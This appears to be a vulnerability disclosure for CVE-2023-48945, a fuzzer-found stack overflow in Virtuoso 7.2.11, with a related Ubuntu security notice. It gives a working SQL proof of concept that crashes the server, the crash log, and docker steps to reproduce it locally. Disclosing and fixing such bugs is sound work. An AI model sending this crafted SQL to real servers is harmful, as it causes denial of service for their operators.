Headline
CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource
A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ;
Server Log:
14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated
Due to the stack smashing, I failed to retrieve the correct backtrace.
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
Related news
Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.